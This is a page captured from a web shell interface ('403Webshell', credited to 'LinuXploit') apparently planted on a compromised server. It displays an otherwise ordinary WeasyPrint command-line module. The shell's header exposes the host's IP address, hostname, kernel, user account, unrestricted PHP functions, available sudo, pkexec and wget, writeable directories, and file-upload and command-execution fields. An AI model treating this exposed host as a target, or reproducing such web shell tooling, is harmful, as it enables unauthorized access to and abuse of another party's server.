403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/calpy/weasyprint/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/calpy/weasyprint/__main__.py
"""Command-line interface to WeasyPrint."""

import argparse
import logging
import platform
import sys

import pydyf

from . import DEFAULT_OPTIONS, HTML, LOGGER, __version__
from .pdf import VARIANTS
from .text.ffi import pango
from .urls import URLFetcher


class PrintInfo(argparse.Action):
    def __call__(*_, **__):
        # TODO: ignore check at block-level when available.
        # https://github.com/astral-sh/ruff/issues/3711
        uname = platform.uname()
        print('System:', uname.system)  # noqa: T201
        print('Machine:', uname.machine)  # noqa: T201
        print('Version:', uname.version)  # noqa: T201
        print('Release:', uname.release)  # noqa: T201
        print()  # noqa: T201
        print('WeasyPrint version:', __version__)  # noqa: T201
        print('Python version:', sys.version.split()[0])  # noqa: T201
        print('Pydyf version:', pydyf.__version__)  # noqa: T201
        print('Pango version:', pango.pango_version())  # noqa: T201
        sys.exit()


class Parser(argparse.ArgumentParser):
    def __init__(self, *args, **kwargs):
        self._groups = {None: {}}
        super().__init__(*args, **kwargs)

    def add_argument(self, *args, _group_name=None, **kwargs):
        if _group_name is None:
            super().add_argument(*args, **kwargs)
        key = args[-1].lstrip('-')
        kwargs['flags'] = args
        kwargs['positional'] = args[-1][0] != '-'
        self._groups[_group_name][key] = kwargs

    def add_argument_group(self, name, *args, **kwargs):
        group = super().add_argument_group(name, *args, **kwargs)
        self._groups[name] = {}
        def add_argument(*args, **kwargs):
            group._add_argument(*args, **kwargs)
            self.add_argument(*args, _group_name=name, **kwargs)
        group._add_argument = group.add_argument
        group.add_argument = add_argument
        return group

    @property
    def docstring(self):
        self._groups[None].pop('help')
        data = []
        for group, arguments in self._groups.items():
            if not arguments:
                continue
            if group:
                data.append(f'{group[0].title()}{group[1:]}\n')
                data.append(f'{"~" * len(group)}\n\n')
            for key, args in arguments.items():
                data.append('.. option:: ')
                action = args.get('action', 'store')
                for flag in args['flags']:
                    data.append(flag)
                    if not args['positional'] and action in ('store', 'append'):
                        data.append(f' <{key}>')
                    data.append(', ')
                data[-1] = '\n\n'
                data.append(f'  {args["help"][0].upper()}{args["help"][1:]}.\n\n')
                if 'choices' in args:
                    choices = ', '.join(args['choices'])
                    data.append(f'  Possible choices: {choices}.\n\n')
                if action == 'append':
                    data.append('  This option can be passed multiple times.\n\n')
        return ''.join(data)


PARSER = Parser(prog='weasyprint', description='Render web pages to PDF.')
PARSER.add_argument('input', help='URL or filename of the HTML input, or - for stdin')
PARSER.add_argument('output', help='filename where output is written, or - for stdout')
PARSER.add_argument(
    '-i', '--info', action=PrintInfo, nargs=0, help='print system information and exit')
PARSER.add_argument(
    '--version', action='version', version=f'WeasyPrint version {__version__}',
    help='print WeasyPrint’s version number and exit')

group = PARSER.add_argument_group('rendering options')
group.add_argument(
    '-s', '--stylesheet', action='append', dest='stylesheets',
    help='URL or filename for a user CSS stylesheet')
group.add_argument(
    '-a', '--attachment', action='append', dest='attachments',
    help='URL or filename of a file to attach to the PDF document')
group.add_argument(
    '--attachment-relationship', action='append', dest='attachment_relationships',
    help='Relationship of the attachment file to attach to the PDF')
group.add_argument('--pdf-identifier', help='PDF file identifier')
group.add_argument('--pdf-variant', choices=VARIANTS, help='PDF variant to generate')
group.add_argument('--pdf-version', help='PDF version number')
group.add_argument('--pdf-forms', action='store_true', help='include PDF forms')
group.add_argument('--pdf-tags', action='store_true', help='tag PDF for accessibility')
group.add_argument(
    '--uncompressed-pdf', action='store_true',
    help='do not compress PDF content, mainly for debugging purpose')
group.add_argument(
    '--xmp-metadata', action='append',
    help='URL or filename of a file to include into the XMP metadata')
group.add_argument(
    '--custom-metadata', action='store_true',
    help='include custom HTML meta tags in PDF metadata')
group.add_argument(
    '--output-intent',
    help='srgb, device-cmyk, or CSS identifier of the output intent color space')
group.add_argument(
    '-p', '--presentational-hints', action='store_true',
    help='follow HTML presentational hints')
group.add_argument(
    '--optimize-images', action='store_true',
    help='optimize size of embedded images with no quality loss')
group.add_argument(
    '-j', '--jpeg-quality', type=int,
    help='JPEG quality between 0 (worst) to 95 (best)')
group.add_argument(
    '-D', '--dpi', type=int,
    help='set maximum resolution of images embedded in the PDF')
group.add_argument(
    '--full-fonts', action='store_true',
    help='embed unmodified font files when possible')
group.add_argument(
    '--hinting', action='store_true', help='keep hinting information in embedded fonts')
group.add_argument(
    '-c', '--cache-folder', dest='cache',
    help='store cache on disk instead of memory, folder is '
    'created if needed and cleaned after the PDF is generated')

group = PARSER.add_argument_group('HTML options')
group.add_argument('-e', '--encoding', help='force the input character encoding')
group.add_argument(
    '-m', '--media-type', help='media type to use for @media, defaults to print',
    default='print')
group.add_argument(
    '-u', '--base-url',
    help='base for relative URLs in the HTML input, defaults to the '
    'input’s own filename or URL or the current directory for stdin')

group = PARSER.add_argument_group('URL fetcher options')
group.add_argument(
    '-t', '--timeout', type=int, help='set timeout in seconds for HTTP requests')
group.add_argument(
    '--allowed-protocols', dest='allowed_protocols',
    help='only authorize comma-separated list of protocols for fetching URLs')
group.add_argument(
    '--no-http-redirects', action='store_true', help='do not follow HTTP redirects')
group.add_argument(
    '--fail-on-http-errors', action='store_true',
    help='abort document rendering on any HTTP error')

group = PARSER.add_argument_group('command-line logging options')
group = group.add_mutually_exclusive_group()
group.add_argument(
    '-v', '--verbose', action='store_true',
    help='show warnings and information messages')
group.add_argument(
    '-d', '--debug', action='store_true', help='show debugging messages')
group.add_argument('-q', '--quiet', action='store_true', help='hide logging messages')

PARSER.set_defaults(**DEFAULT_OPTIONS)


def main(argv=None, stdout=None, stdin=None, HTML=HTML):  # noqa: N803
    """The ``weasyprint`` program takes at least two arguments:

    .. code-block:: sh

        weasyprint [options] <input> <output>

    """
    args = PARSER.parse_args(argv)

    if args.input == '-':
        source = stdin or sys.stdin.buffer
        if args.base_url is None:
            args.base_url = '.'  # current directory
        elif args.base_url == '':
            args.base_url = None  # no base URL
    else:
        source = args.input

    if args.output == '-':
        output = stdout or sys.stdout.buffer
    else:
        output = args.output

    fetcher_args = {}
    if args.timeout is not None:
        fetcher_args['timeout'] = args.timeout
    if args.allowed_protocols is not None:
        fetcher_args['allowed_protocols'] = {
            protocol.strip().lower() for protocol in args.allowed_protocols.split(',')}
    if args.no_http_redirects:
        fetcher_args['allow_redirects'] = False
    if args.fail_on_http_errors:
        fetcher_args['fail_on_errors'] = True
    url_fetcher = URLFetcher(**fetcher_args)

    options = {
        key: value for key, value in vars(args).items() if key in DEFAULT_OPTIONS}

    if not args.quiet:
        if args.debug:
            LOGGER.setLevel(logging.DEBUG)
        elif args.verbose:
            LOGGER.setLevel(logging.INFO)
        logging.basicConfig(format=
            '%(levelname)s: %(name)s %(filename)s:%(lineno)d '
            '(%(funcName)s): %(message)s'
            if args.debug else '%(levelname)s: %(message)s',
            level=logging.DEBUG if args.debug else None)

    html = HTML(
        source, base_url=args.base_url, encoding=args.encoding,
        media_type=args.media_type, url_fetcher=url_fetcher)
    html.write_pdf(output, **options)


main.__doc__ += '\n\n' + PARSER.docstring


if __name__ == '__main__':  # pragma: no cover
    main()

Youez - 2016 - github.com/yon3zu
LinuXploit